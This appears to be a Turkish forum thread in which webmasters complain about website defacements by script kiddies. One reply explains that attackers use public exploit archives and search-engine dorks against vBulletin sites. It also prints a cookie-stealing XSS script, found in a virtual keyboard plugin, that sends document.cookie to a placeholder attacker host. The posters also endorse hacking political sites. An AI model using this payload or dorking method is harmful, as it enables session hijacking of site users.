gizemsiz adlı üyeden alıntı: mesajı görüntüle
FOXXLY abim öncelikle güzel dileklerin için teşekkür ederim. hostumuzda bir problem oldu, bilgi verdiler. sorun değil bu. artık saldırı yiyeceğimi sanmıyorum. çünkü hem mahkemeye veririm hemde bizzat gider yüz yüze tanışırım. elimde mutlaka bir video kamerası olur ve yine sizlerle paylaşırım. ben bot beslemesinler hacklemesinler demiyorum. yurt dışında bizi temsil etsinler. bir pkk sempatizan sitesi gördüklerinde kapatsınlar ve yazsınlar. o zaman benden sonuna kadar destek alırlar. belkide buradaki çoğu insan yardımcı olur ne gerekliyse yapar. ama gelipte aynı toprağın üzerinde yaşayanın bir başkasına bunu yapması ayıp. benim domainimin com 'u eski ortağımın sunucusunda. onun sunucusu windows ve asp desteği var. ben asp öğrenmek için kul. adını domain, şifreyide 123456 yapmıştım. çocuğun biri gelmiş hack sayfası atmış. hiçte güleceğim yoktu. çocuğu ekledim konuşmaya başladık. belli yani konuşmalarından bu bir çocuk. yani beni karşısında görse mutlaka altına kaçırır. birde senin pc de keylogger var işte şifreyi senden aldım diyor. Ben pc mühendisiyim ve onun gibi binlercesini ezer geçerim. yine sakin ve efendi konuştum. girdim pleske şifreyi değiştirdim. hadi hackle dedim. baktım çıt yok )) bende sildim engelledim. ya bizim toplum bu şekilde bilinçlendirildiği sürece, anamız babamız başımızda olmayıpta bizi topluma hayırlı bir evlat yetiştirmediği sürece bu böyle devam eder. bir insanı tanımadan önce ailesini tanıyın. istisnalar kaideyi bozmaz bunu bir paranteze alalım. velhasıl ima etmek istediklerimi umarım anladınız. ben yine çok konuşmaya başladım. hadi hayırlı günler.
Saygılarımla.

SOnuna kadar hakklısın zon zmanalrda değil resmen bu yıl işin cıvkı cıktı hack sitesi açmak sadece bir ego oldu aynen Bizim kampüste Doc Dr bir hocamız var diyor ya diyor bu admalr hackleyince ne zevk alıyorlar herhalde onalrında mastubasyonu o olsa gerek demişti gülmekten yaraıldım ama sonuna kadar hakklı coluk cocuk önüne gelen web sitesine saldırmasın nedeni Genel Acıkalrı Kullanmaları Örnegin forum sistemi bu forumunda olgu gibi Vb(vbulletin) genel olarakda acıklar sonrada eklen modlarda ve eklentilerde oluyor ve milw0rm securtyfocus gibi bi ton acıkları kayıt altına alan sitelerden var olan kodları kullanıp allinurl inurl "powred by vb" gibisiden bu acıgı olan sitelere saldırı yapıyorlar hiçbiride gelip sırf size saldırmış olmak işin saldırmıyor hepsinin tek amacı var acaba bu acıgı olan siteler halen acıkalrını kapamışmı kapamdıysa hemen hackleyelim Burdaki Hata tamamen webmasterlarda web master olmak site kurmak düzenlemk değil güvenliğide sağlamaktır saçma sapan bton ekletiyi ekliyorlar sonrada neden hacklendik diyorlar ben herkese kızıyorum adam gibi işini yapan yok geçenlerdede oldu ark forum siteme sanal klavye eklentisi yüklermisin dedi. tamam hayhay dedim Bi baktımki hayda JS kodunun içine sanal kalvyeyi aldıgımız yerdeki arkadaşlar yada başkası artık cookie stealer koymuş bildiğiniz xss yani

<script>document.location.replace
(‘http://attackershost/lifting.php?cookie=’+document.cookie);</scripting>

tarzı bi kodu yaptıgı tek şey cookileri göndermek ama şansımız varki FireFOx Noscritp kullanıyorum hem adresse baktım free hostan alınmış ve alan kapamış yani bu kod bayadır yayılmış okadr zman olmuşki free hostan aldıgı alan bile kapanmış Büyük PKK ve yandaş sitelerin hacklenmesine canı gönülden destek veriyorum ama söylede bişe var her gördüğünüz hacked yazısına inanmayın tamamen kolpa içerikli hazırlanmış domain ve serverlardan oluyor son zmanda hack yapmayı bilen insanlarda zaten coluk cocukla uğraşmaktan sıkılmış kendi yolluna gitmiş kişiler artık Bence En güzel Yöntem tüm Hack İçerikli Forumların Kapatılması kendi forumumda dahil canı gönülden türkiyede tmeiz bi internet isityorum